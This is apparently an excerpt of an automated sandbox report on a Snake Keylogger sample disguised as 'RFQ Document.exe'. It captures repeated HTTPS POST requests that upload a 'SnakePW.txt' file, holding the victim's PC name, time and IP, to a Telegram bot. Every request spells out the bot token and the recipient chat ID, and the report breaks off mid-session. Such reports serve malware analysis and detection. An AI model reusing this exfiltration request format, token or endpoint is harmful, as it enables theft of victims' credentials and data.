                                            Data Ascii: {"ok":true,"result":{"message_id":12597,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            170192.168.2.449988149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:09 UTC272OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255deca8634
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:09 UTC272OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 63 61 38 36 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255deca8634Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC272INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC273INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12759,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            171192.168.2.449991149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:09 UTC273OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dee894c0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:09 UTC273OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 65 38 39 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dee894c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC274INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC274INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12760,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            172192.168.2.449992149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:09 UTC275OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255df063068
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:09 UTC275OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 30 36 33 30 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255df063068Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC275INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC276INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12761,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            173192.168.2.449993149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:09 UTC276OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255df235a04
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:09 UTC277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 32 33 35 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255df235a04Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC277INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC277INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12762,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            174192.168.2.449994149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:11 UTC278OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255df4279f6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:11 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 34 32 37 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255df4279f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:11 UTC279INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:11 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:11 UTC279INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12763,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            175192.168.2.449996149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:11 UTC280OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dffbb2a4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:11 UTC280OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 66 62 62 32 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dffbb2a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:11 UTC280INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:11 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:11 UTC281INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12764,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            176192.168.2.449997149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:11 UTC281OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e01f7428
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:11 UTC281OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 31 66 37 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e01f7428Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:11 UTC282INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:11 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:11 UTC282INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12765,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            177192.168.2.449998149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:11 UTC283OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e0374e0e
                                            Host: api.telegram.org
                                            Content-Length: 407
